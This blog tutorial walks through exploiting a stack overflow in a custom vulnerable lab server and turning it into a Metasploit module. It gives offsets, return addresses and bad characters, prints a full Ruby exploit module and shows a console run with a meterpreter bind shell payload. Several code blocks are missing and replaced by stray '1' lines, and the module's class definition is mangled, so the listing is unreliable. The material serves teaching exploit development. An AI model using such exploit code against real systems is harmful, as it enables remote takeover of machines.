i From Exploit to Metasploit – The Basic – All things in moderation

From Exploit to Metasploit – The Basic

Hi all!
To day, we will discuss how to write code as a module Metasploit exploit. Metasploit module written in ruby. Even if you do not know much about the ruby, you can still write a Metasploit module based on the exploitation instructions below and are available in Metasploit exploit.

Metasploit module structure
A typical Metasploit module will include the following sections:

header and some dependencies
            Some comments about the exploit module
            require ‘msf/core’
class definition
includes
“def” definitions :
        Initialize
        check (optional)
        exploit

In Metasploit, we will using “#” be made comment.

Now, building an exploit for a simple vulnerable server!
We will use the vulnerable code below to implement the process of developing exploit code.

1
1
1

We will compile code with Icc-win32.
Run file .exe on windows server 2003 R2 sp2.
We will send 1000 bytes to server, the server will crash.
Code demo:

Code send 1000 bytes

The server crash, EIP gets overwritten with A’s.

server crash

We will using module metasploit pattern, we determine that the offset to EIP overwrite is at 504 bytes. So we’ll build a new crash script to verify the offset and see the contents of the registers when the overflow occurs :

Built shellcode demo

After sending 504 A’s, 4 B’s and a bunch of C’s, we can see the following register and stack contents :

1

Increasing the size of the $ junk to see how much space we have to store shellcode. This is important because we will need to specify this parameter in the Metasploit module.
Change the value of $ totalbuffer into 2000, the overflow will take place as expected, and based on the contents of the ESP we can see that we can fill with ESP + 5d3 memory (1491 byte). It will be the space containing our shellcode.
All you have to do is to overwrite EIP with jmp esp (esp or call, or something similar), and put our shellcode instead of the letter C.
Perform a search in the DLL code jump is loaded when the program runs. We can use or used directly findjmp windbg by looking opcode address dll in that paragraph. Here we will perform in ws2_32.dll. (Can review all the way 2)

1

Address 0x71C02B67.
After doing some tests with shellcode, we can use the following conclusions to build the final exploits
– exclude 0xff from the shellcode
– put some nop’s before the shellcode
Our final exploit ( in perl, with a shell bound to tcp 5555 ) looks like this :

1
1
(Note: implementation running on windows xp sp2. So we have to change the address on windows xp sp2 jumpcode address is jumpcode 0x71ab9372)

1

Exploit output:
1

OK! Now shellcode has run successfully. I have been boarding telnet server. We can perform any task desired nothing.
The key parameters that we can derive from this exploit:
– Offset is 504 bytes(overwrite EIP)
– Windows 2003 R2 SP2(English) have jump address is 0x71C02B67
– Shellcode should not contain 0x00 or 0xff
– Shellcode can be more or less 1400 bytes
Converting the exploit to metasploit

First we need to determine what type of exploitation, because it will locate within a continental structure where I will save Metasploit exploit code. If the goal is to ftp server, it must be placed under the windows ftp server operators.
Module Metasploit stored in the following path (in kali): /usr/share/metasploit-framework/
We will create our Metasploit module in place:% Metasploit% / modules / windows / Misc:

1

#
#
# Custom metasploit exploit for vulnserver.c
# Written by Cloudi
#
#
require 'msf/core'

class Metasploit3  'Custom vulnerable server stack overflow',
                        'Description'    => %q{
                                        This module exploits a stack overflow in a 
                                        custom vulnerable server.
                                             },
                        'Author'         => [ 'Cloudi' ],
                        'Version'        => '$Revision: 9999 $',
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1400,
                                        'BadChars' => "\x00\xff",
                                },
                        'Platform'       => 'win',

                        'Targets'        =>
                                [
                                        ['Windows XP SP3 En',
                                          { 'Ret' => 0x71ab9372, 'Offset' => 504 } ],
                                        ['Windows 2003 Server R2 SP2',
                                          { 'Ret' => 0x71c02b67, 'Offset' => 504  } ],
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                                Opt::RPORT(200)
                        ], self.class)
       end

       def exploit
          connect

          junk = make_nops(target['Offset'])
          sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
          sock.put(sploit)

          handler
          disconnect

       end

end

We see the following components :

  • first, put “require msf/core”, which will be valid for all metasploit exploits
  • define the class. In our case, it is a remote exploit.
  • Next, set exploit information and exploit definitions :
  • include : in our case, it is a plain tcp connection, so we use Msf::Exploit::Remote::Tcp
  • Metasploit has handlers for http, ftp, etc… (which will help you building exploits faster because you don’t have to write the entire conversation yourself)
  • Information :
  • Payload : define the length and badchars (0x00 and 0xff in our case)
  • Define the targets, and define target-specific settings such as return address, offset, etc
  • Exploit
  • connect (which will set up the connection to the remote port)
  • build the buffer
  • junk (nops, with size of offset)
  • add the return address, more nops, and then the encoded payload
  • write the buffer to the connection
  • handle the exploit
  • disconnect

Test
We will test on windows 2k3 SP2.
Open Metasploit on Kali linux:

A database appears to be already configured, skipping initialization
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.8-                             ]
+ -- --=[ 1520 exploits - 880 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use windows/misc/test_vulserver
msf exploit(test_vulserver) > show options

Module options (exploit/windows/misc/test_vulserver):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    200              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 En


msf exploit(test_vulserver) > set rhost 192.168.231.143
rhost => 192.168.231.143
msf exploit(test_vulserver) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP SP2 En
   1   Windows 2003 Server R2 SP2


msf exploit(test_vulserver) > set target 0
target => 0
msf exploit(test_vulserver) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(test_vulserver) > show options 

Module options (exploit/windows/misc/test_vulserver):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.231.143  yes       The target address
   RPORT  200              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.231.143  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 En


msf exploit(test_vulserver) > exploit 

[*] Started bind handler


Result:

1

Leave a Reply